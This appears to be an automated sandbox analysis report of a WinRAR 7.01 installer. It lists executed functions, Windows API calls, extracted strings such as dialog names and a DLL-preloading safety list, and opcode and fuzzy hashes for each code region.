Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 618f7d25376aa255bbdfa3a75b8ffd8cf17c0e4768c1c1f1997934222ba024a4
Instruction ID: 65659b0c98722a0954f4466689474d3d9b45bfc8dbc06203bca04d7509224870
Opcode Fuzzy Hash: 618f7d25376aa255bbdfa3a75b8ffd8cf17c0e4768c1c1f1997934222ba024a4
Instruction Fuzzy Hash: 73F06DB4C49245DFE706EFB8E94878CBFB0EB09300F5082AAD444D3225E3304A44CB51

Function 04C20A81 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adca614d2710346167a0661222dbe848a8aee3d0dad80ae89e34c752c8722cf6
Instruction ID: 512ceda1c19c2affcc4e08290a30ff01c7adc84f1222a25aa3ab7bc84281cc09
Opcode Fuzzy Hash: adca614d2710346167a0661222dbe848a8aee3d0dad80ae89e34c752c8722cf6
Instruction Fuzzy Hash: F5211974E402098FDB08DFA9D5906EEBBF2BF89300F60952AD408B3354DB345946CB55

Function 04C20A90 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 066e92f4d4677800176d5d5435bd8f7afd9f3477b6687fe4deb4a1daca0e3f70
Instruction ID: 081de4ded26d7042c88071fb540663120c840c47dba4e8477739dc6fbb05bfe8
Opcode Fuzzy Hash: 066e92f4d4677800176d5d5435bd8f7afd9f3477b6687fe4deb4a1daca0e3f70
Instruction Fuzzy Hash: 6F210974E402099FCB04DFA9D590AEEBBF2BF89310F24982AD418B3354DB346942CF55

Function 04C20899 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03b9e0cc7815088bdce4ad9f0ec83265a6a065abab02b5190738bda14d1ba523
Instruction ID: ca1d60ff5bc8e8cd5d5fa1bc20908c171be79b9cdd06e739514812a4481e7ebf
Opcode Fuzzy Hash: 03b9e0cc7815088bdce4ad9f0ec83265a6a065abab02b5190738bda14d1ba523
Instruction Fuzzy Hash: 3311F7B8E04209DFDB45DFA9D9546AEBBF1FB48300F2085AAD818A7365E7305A00DB81

Function 04C20848 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787502524.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_WinRAR 7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2fab93a28aba893ab8ae7680f4b36c4a59aaf1b4f535d22a4c426298d6266a5
Instruction ID: f788565764e56458f0473da01b16f73fedfd5b208365fcf4b43fd07afe544941
Opcode Fuzzy Hash: b2fab93a28aba893ab8ae7680f4b36c4a59aaf1b4f535d22a4c426298d6266a5
Instruction Fuzzy Hash: 0FF0C974D4120ADFCB45EFB8EA4878CBBF5EB48305F1096A9D908D3225E7705A44CB95

Analysis Process: winrar_x64_701ar.exePID: 7544, Parent PID: 7492COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.1%
Total number of Nodes:	1418
Total number of Limit Nodes:	19

Executed Functions

Function 00007FF6C3BB4930 Relevance: 79.7, APIs: 35, Strings: 10, Instructions: 931windowfilesleepCOMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32 ref: 00007FF6C3BB4A82
GetMessageW.USER32 ref: 00007FF6C3BB4AB2
IsDialogMessageW.USER32 ref: 00007FF6C3BB4ACB
TranslateMessage.USER32 ref: 00007FF6C3BB4ADD
DispatchMessageW.USER32 ref: 00007FF6C3BB4AEB
GetDlgItem.USER32 ref: 00007FF6C3BB4C07
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB4C28
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB4C40
GetLastError.KERNEL32 ref: 00007FF6C3BB4D44
GetLastError.KERNEL32 ref: 00007FF6C3BB4D66
GetTickCount.KERNEL32 ref: 00007FF6C3BB4D8C
GetLastError.KERNEL32 ref: 00007FF6C3BB4DF1
GetCommandLineW.KERNEL32 ref: 00007FF6C3BB4F06
CreateFileMappingW.KERNEL32 ref: 00007FF6C3BB4FB7
MapViewOfFile.KERNEL32 ref: 00007FF6C3BB4FDA
Sleep.KERNEL32 ref: 00007FF6C3BB5075
UnmapViewOfFile.KERNEL32 ref: 00007FF6C3BB509E
CloseHandle.KERNEL32 ref: 00007FF6C3BB50A7
SetDlgItemTextW.USER32 ref: 00007FF6C3BB51E5
SetDlgItemTextW.USER32 ref: 00007FF6C3BB520A
GetDlgItem.USER32 ref: 00007FF6C3BB5218
SetWindowLongPtrW.USER32 ref: 00007FF6C3BB5246
SetDlgItemTextW.USER32 ref: 00007FF6C3BB5310
SendDlgItemMessageW.USER32 ref: 00007FF6C3BB54FF
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB552D
SendDlgItemMessageW.USER32 ref: 00007FF6C3BB5551
GetDlgItem.USER32 ref: 00007FF6C3BB555F
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB5579
GetDlgItem.USER32 ref: 00007FF6C3BB559C
SetDlgItemTextW.USER32 ref: 00007FF6C3BB562F
SetDlgItemTextW.USER32 ref: 00007FF6C3BB5647
SetForegroundWindow.USER32 ref: 00007FF6C3BB56BB
DialogBoxParamW.USER32 ref: 00007FF6C3BB5714
IsDlgButtonChecked.USER32 ref: 00007FF6C3BB58C0
SetDlgItemTextW.USER32 ref: 00007FF6C3BB58E9

Strings

WinRAR, xrefs: 00007FF6C3BB4B94
runas, xrefs: 00007FF6C3BB4EAD
@, xrefs: 00007FF6C3BB4E9A
d, xrefs: 00007FF6C3BB507D
p, xrefs: 00007FF6C3BB4E8F
winrarsfxmappingfile.tmp, xrefs: 00007FF6C3BB4F98
STARTDLG, xrefs: 00007FF6C3BB4964
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF6C3BB4E7D
LICENSEDLG, xrefs: 00007FF6C3BB5706
__tmp_rar_sfx_access_check_, xrefs: 00007FF6C3BB4DA5

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Item$Text$Message$ButtonChecked$ErrorFileLast$DialogSendViewWindow$CloseCommandCountCreateDispatchForegroundHandleLineLongMappingParamSleepTickTranslateUnmap
String ID: -el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$STARTDLG$WinRAR$__tmp_rar_sfx_access_check_$d$p$runas$winrarsfxmappingfile.tmp
API String ID: 2871939584-91551015
Opcode ID: b9c47037542b67834d7a0200151014d0992c603676f7b0dcaeaf442f5d3da4de
Instruction ID: 227ac22bca43099aa8e233bace7cc7f32b483bb61ccec67c5253c0f354db0e08
Opcode Fuzzy Hash: b9c47037542b67834d7a0200151014d0992c603676f7b0dcaeaf442f5d3da4de
Instruction Fuzzy Hash: 9F92A425E0CB4242FA14AF25E893AF97361AFB7746F400031D9CDEB6A6DE2DE509C741

Function 00007FF6C3BB41D0 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 228
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6C3BAA548: GetModuleHandleW.KERNEL32 ref: 00007FF6C3BAA592
Part of subcall function 00007FF6C3BAA548: GetProcAddress.KERNEL32 ref: 00007FF6C3BAA5AA
Part of subcall function 00007FF6C3BAA548: GetProcAddress.KERNEL32 ref: 00007FF6C3BAA5CC

Part of subcall function 00007FF6C3BA4A5C: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00007FF6C3BA449F), ref: 00007FF6C3BA4A6D
Part of subcall function 00007FF6C3BA4A5C: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00007FF6C3BA449F), ref: 00007FF6C3BA4A9D

Part of subcall function 00007FF6C3BB2794: OleInitialize.OLE32 ref: 00007FF6C3BB27AE
Part of subcall function 00007FF6C3BB2794: GdiplusStartup.GDIPLUS ref: 00007FF6C3BB27E6
Part of subcall function 00007FF6C3BB2794: SHGetMalloc.SHELL32 ref: 00007FF6C3BB27F3

GetCommandLineW.KERNEL32 ref: 00007FF6C3BB4280
OpenFileMappingW.KERNEL32 ref: 00007FF6C3BB42CE
MapViewOfFile.KERNEL32 ref: 00007FF6C3BB42F7
UnmapViewOfFile.KERNEL32 ref: 00007FF6C3BB4318
UnmapViewOfFile.KERNEL32 ref: 00007FF6C3BB439C
MapViewOfFile.KERNEL32 ref: 00007FF6C3BB4335

Part of subcall function 00007FF6C3BB4688: SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6C3BB43C4), ref: 00007FF6C3BB46AF
Part of subcall function 00007FF6C3BB4688: SetEnvironmentVariableW.KERNEL32 ref: 00007FF6C3BB470C

CloseHandle.KERNEL32 ref: 00007FF6C3BB43A5
SetEnvironmentVariableW.KERNEL32 ref: 00007FF6C3BB4407
GetLocalTime.KERNEL32 ref: 00007FF6C3BB4412
SetEnvironmentVariableW.KERNEL32 ref: 00007FF6C3BB4480
GetModuleHandleW.KERNEL32 ref: 00007FF6C3BB4488
LoadIconW.USER32 ref: 00007FF6C3BB44A7
DialogBoxParamW.USER32 ref: 00007FF6C3BB44FB
Sleep.KERNEL32 ref: 00007FF6C3BB452D
CloseHandle.KERNEL32 ref: 00007FF6C3BB45AD

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF6C3BB445C
sfxname, xrefs: 00007FF6C3BB4400
winrarsfxmappingfile.tmp, xrefs: 00007FF6C3BB42C0
sfxstime, xrefs: 00007FF6C3BB4479
STARTDLG, xrefs: 00007FF6C3BB44EA

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: File$EnvironmentHandleVariableView$AddressCloseCurrentDirectoryModuleProcUnmap$CommandDialogGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 4229727620-3710569615
Opcode ID: 4ae8dcc793cea09aea43a3dc4dbc4113840bcadcc63ac6bfb28d7414d2e21f10
Instruction ID: 2666a8dc2e62e4f3fa4af1147cad58ff918bc610fda49e980ace4f1ece5af81f
Opcode Fuzzy Hash: 4ae8dcc793cea09aea43a3dc4dbc4113840bcadcc63ac6bfb28d7414d2e21f10
Instruction Fuzzy Hash: CDC16F75A18B4295EB10EF25E893AB973A0BFB6746F400031D5CDEA6A6DF3CE509C740

Function 00007FF6C3BB5ABC Relevance: 30.9, APIs: 6, Strings: 11, Instructions: 1184COMMON

Download Yara Rule

Strings

@set:user, xrefs: 00007FF6C3BB65CC
Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF6C3BB5FB5
.tmp, xrefs: 00007FF6C3BB6349
RarSFX, xrefs: 00007FF6C3BB64B9, 00007FF6C3BB652A
lnk, xrefs: 00007FF6C3BB6AAD
.lnk, xrefs: 00007FF6C3BB6AE2
MIN, xrefs: 00007FF6C3BB5D84
<br>, xrefs: 00007FF6C3BB6106
HIDE, xrefs: 00007FF6C3BB5D28
MAX, xrefs: 00007FF6C3BB5D56
ProgramFilesDir, xrefs: 00007FF6C3BB5FA4

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$RarSFX$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 0-381327784
Opcode ID: 344c6e6b81a6546dd1874b499a3455b5a7bdc5232c1c90d7ae4548546823ffd1
Instruction ID: 6238c95ce6108973e6d1b9e4c1f16bfe80a6585138659afe01f3945b322c9f3d
Opcode Fuzzy Hash: 344c6e6b81a6546dd1874b499a3455b5a7bdc5232c1c90d7ae4548546823ffd1
Instruction Fuzzy Hash: FFB23422E18A4695EB10EF64C8929FD6371AFB2359F405132D5CDEB5E6DE2CE909C340

Function 00007FF6C3BA5B4C Relevance: 19.8, APIs: 1, Strings: 10, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6C3BAC574: MultiByteToWideChar.KERNEL32(?,?,?,?,0000002A,00007FF6C3BAC61A), ref: 00007FF6C3BAC5A1

__swprintf_l.LIBCMT ref: 00007FF6C3BA6075

Strings

STRINGS, xrefs: 00007FF6C3BA5EED
RTL, xrefs: 00007FF6C3BA602B
*messages***, xrefs: 00007FF6C3BA5D3A
DIALOG, xrefs: 00007FF6C3BA5EF9
*messages***, xrefs: 00007FF6C3BA5CFC
,, xrefs: 00007FF6C3BA61DB
DIRECTION, xrefs: 00007FF6C3BA5F10
@%s:, xrefs: 00007FF6C3BA6056
MENU, xrefs: 00007FF6C3BA5F05
$%s:, xrefs: 00007FF6C3BA604F

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: ByteCharMultiWide__swprintf_l
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3405735246-2291855099
Opcode ID: 4c8cdaf5374277e586a6af8197ceb8720bacdc96012a2ce04d4906171d4e573e
Instruction ID: 5b58f6e71228791663f8c45ccc92c15933a47534a4344f78d739fb9fd58dbc12
Opcode Fuzzy Hash: 4c8cdaf5374277e586a6af8197ceb8720bacdc96012a2ce04d4906171d4e573e
Instruction Fuzzy Hash: 3022A261A18E4395EA20DF24D442AF963A0FF72749F800136EADDA76D5EF3DE605C740

Function 00007FF6C3BA6960 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6C3BAC520: WideCharToMultiByte.KERNEL32 ref: 00007FF6C3BAC551

SetDlgItemTextW.USER32 ref: 00007FF6C3BA6A14
GetWindowRect.USER32 ref: 00007FF6C3BA6A48
GetClientRect.USER32 ref: 00007FF6C3BA6A56
GetWindowRect.USER32 ref: 00007FF6C3BA6B42
SetDlgItemTextW.USER32 ref: 00007FF6C3BA6B78
GetSystemMetrics.USER32 ref: 00007FF6C3BA6B83
GetWindow.USER32 ref: 00007FF6C3BA6B94
GetWindowRect.USER32 ref: 00007FF6C3BA6BCE
GetWindow.USER32 ref: 00007FF6C3BA6C90

Strings

CAPTION, xrefs: 00007FF6C3BA6B5E
$%s:, xrefs: 00007FF6C3BA69A2

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: Window$Rect$ItemText$ByteCharClientMetricsMultiSystemWide
String ID: $%s:$CAPTION
API String ID: 612398153-404845831
Opcode ID: ee7c6a2717057d0bed3ba9a49207a42e0b11ab8094b40c8b8e3542f0488fcae4
Instruction ID: 3ce072583e8c60f120a1b4fec3037b229a17768fb81c61386d685d534e8794e2
Opcode Fuzzy Hash: ee7c6a2717057d0bed3ba9a49207a42e0b11ab8094b40c8b8e3542f0488fcae4
Instruction Fuzzy Hash: A0912B76B286428BD718CF39E802A697760FB99785F405135EECDA7B58CE3DE905CB00

Function 00007FF6C3BB1FEC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32 ref: 00007FF6C3BB2005
SizeofResource.KERNEL32 ref: 00007FF6C3BB2021
LoadResource.KERNEL32 ref: 00007FF6C3BB203B
LockResource.KERNEL32 ref: 00007FF6C3BB204D
GlobalAlloc.KERNEL32 ref: 00007FF6C3BB206C
GlobalLock.KERNEL32 ref: 00007FF6C3BB2081
GlobalUnlock.KERNEL32 ref: 00007FF6C3BB211B

Part of subcall function 00007FF6C3BB25C0: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF6C3BB25DE

GlobalFree.KERNEL32 ref: 00007FF6C3BB2124

Strings

PNG, xrefs: 00007FF6C3BB1FF7

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: 6e6bf86b030be450644aadc403cb9e14e21563b103a4267463e7844ec5b29060
Instruction ID: 611ad7ee9d5542bbbecb35da6aaa3a68ca252f023049ea3084753b87a42152c1
Opcode Fuzzy Hash: 6e6bf86b030be450644aadc403cb9e14e21563b103a4267463e7844ec5b29060
Instruction Fuzzy Hash: 2C316310B09F0241FE049F56E896A79A3A1AFAABD6F044035DDCDEB7A4DE7CE444C700

Function 00007FF6C3B95330 Relevance: 1.9, Strings: 1, Instructions: 612COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF6C3B95BA6

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: 351ff16d4104adea7f1074458176bd78b00927301f114295ad6265ad447cbcbf
Instruction ID: 8e0439a4030347a7a0f4f2db96d1b8940530741da20ff19936317e7caca867f6
Opcode Fuzzy Hash: 351ff16d4104adea7f1074458176bd78b00927301f114295ad6265ad447cbcbf
Instruction Fuzzy Hash: A342B162B0878296EA04DF60D642AFD67B1FB72385F400036EACEE7696DF38E555C700

Function 00007FF6C3BB0A20 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

SetWindowLongPtrW.USER32 ref: 00007FF6C3BB0A52

Memory Dump Source

Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true

Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 6db9b2efe3c25178f9d477f987fa70b0f48e55e0aa98e6770473b5fbfdc9b696
Instruction ID: d7418216e740c03f0c1da7ba7966fb1380131d583e09b66a3439d85e02753eb9
Opcode Fuzzy Hash: 6db9b2efe3c25178f9d477f987fa70b0f48e55e0aa98e6770473b5fbfdc9b696
Instruction Fuzzy Hash: 8BF0C237B18B90C1D6049F03A980499BB64F79AFC0B189031DFC967715CE38E551C740

Function 00007FF6C3BAA548 Relevance: 145.7, APIs: 16, Strings: 67, Instructions: 421
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6C3BAA592
GetProcAddress.KERNEL32 ref: 00007FF6C3BAA5AA
GetProcAddress.KERNEL32 ref: 00007FF6C3BAA5CC
CreateFileW.KERNEL32 ref: 00007FF6C3BAA968
SetFilePointer.KERNEL32 ref: 00007FF6C3BAA986
ReadFile.KERNEL32 ref: 00007FF6C3BAA9AE
CompareStringW.KERNEL32 ref: 00007FF6C3BAAA9E
CloseHandle.KERNEL32 ref: 00007FF6C3BAAA38

Part of subcall function 00007FF6C3BAAD40: GetSystemDirectoryW.KERNEL32 ref: 00007FF6C3BAAD8F
Part of subcall function 00007FF6C3BAAD40: LoadLibraryW.KERNEL32 ref: 00007FF6C3BAADF9

Part of subcall function 00007FF6C3BA2A74: GetVersionExW.KERNEL32 ref: 00007FF6C3BA2AA5

AllocConsole.KERNEL32 ref: 00007FF6C3BAAC7A
GetCurrentProcessId.KERNEL32 ref: 00007FF6C3BAAC84
AttachConsole.KERNEL32 ref: 00007FF6C3BAAC8C
GetStdHandle.KERNEL32 ref: 00007FF6C3BAACB1
WriteConsoleW.KERNEL32 ref: 00007FF6C3BAACCA
Sleep.KERNEL32 ref: 00007FF6C3BAACD5
FreeConsole.KERNEL32 ref: 00007FF6C3BAACDB
ExitProcess.KERNEL32 ref: 00007FF6C3BAACED

Strings

rasadhlp.dll, xrefs: 00007FF6C3BAA885
ieframe.dll, xrefs: 00007FF6C3BAA68D
dhcpcsvc6.dll, xrefs: 00007FF6C3BAA893
netapi32.dll, xrefs: 00007FF6C3BAA6E1
cryptsp.dll, xrefs: 00007FF6C3BAA8CB
WindowsCodecs.dll, xrefs: 00007FF6C3BAA789
oleaccrc.dll, xrefs: 00007FF6C3BAA75F
aclui.dll, xrefs: 00007FF6C3BAA8E7
cryptbase.dll, xrefs: 00007FF6C3BAA632
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF6C3BAAC69
srvcli.dll, xrefs: 00007FF6C3BAA797
cscapi.dll, xrefs: 00007FF6C3BAA7A5
ws2_32.dll, xrefs: 00007FF6C3BAA669
iphlpapi.DLL, xrefs: 00007FF6C3BAA7DD
kernel32, xrefs: 00007FF6C3BAA58B
profapi.dll, xrefs: 00007FF6C3BAA77B
dhcpcsvc.dll, xrefs: 00007FF6C3BAA8A1
mlang.dll, xrefs: 00007FF6C3BAA831
lpk.dll, xrefs: 00007FF6C3BAA63D
wintrust.dll, xrefs: 00007FF6C3BAA727
dnsapi.DLL, xrefs: 00007FF6C3BAA7CF
linkinfo.dll, xrefs: 00007FF6C3BAA8BD
propsys.dll, xrefs: 00007FF6C3BAA823
psapi.dll, xrefs: 00007FF6C3BAA67F
atl.dll, xrefs: 00007FF6C3BAA6A9
apphelp.dll, xrefs: 00007FF6C3BAA6C5
SetDefaultDllDirectories, xrefs: 00007FF6C3BAA5C2
userenv.dll, xrefs: 00007FF6C3BAA6D3
cabinet.dll, xrefs: 00007FF6C3BAA751
shdocvw.dll, xrefs: 00007FF6C3BAA6EF
slc.dll, xrefs: 00007FF6C3BAA7B3
clbcatq.dll, xrefs: 00007FF6C3BAA653
devrtl.dll, xrefs: 00007FF6C3BAA815
UXTheme.dll, xrefs: 00007FF6C3BAA61C
crypt32.dll, xrefs: 00007FF6C3BAA6FD
RpcRtRemote.dll, xrefs: 00007FF6C3BAA8D9
SetDllDirectoryW, xrefs: 00007FF6C3BAA5A0
browcli.dll, xrefs: 00007FF6C3BAA877
samlib.dll, xrefs: 00007FF6C3BAA84D
shell32.dll, xrefs: 00007FF6C3BAA735
rsaenh.dll, xrefs: 00007FF6C3BAA611
msasn1.dll, xrefs: 00007FF6C3BAA70B
samcli.dll, xrefs: 00007FF6C3BAA83F
DXGIDebug.dll, xrefs: 00007FF6C3BAA5F0, 00007FF6C3BAAAE1
imageres.dll, xrefs: 00007FF6C3BAA7C1
ntmarta.dll, xrefs: 00007FF6C3BAA76D
WINNSI.DLL, xrefs: 00007FF6C3BAA7EB
mpr.dll, xrefs: 00007FF6C3BAA807
setupapi.dll, xrefs: 00007FF6C3BAA6B7
ntshrui.dll, xrefs: 00007FF6C3BAA69B
xlistpos, xrefs: 00007FF6C3BAA91E
dsrole.dll, xrefs: 00007FF6C3BAA8F5
dwmapi.dll, xrefs: 00007FF6C3BAA627, 00007FF6C3BAAB72
version.dll, xrefs: 00007FF6C3BAA5E5
netutils.dll, xrefs: 00007FF6C3BAA7F9
SSPICLI.DLL, xrefs: 00007FF6C3BAA606
secur32.dll, xrefs: 00007FF6C3BAA743
cryptui.dll, xrefs: 00007FF6C3BAA719
XmlLite.dll, xrefs: 00007FF6C3BAA8AF
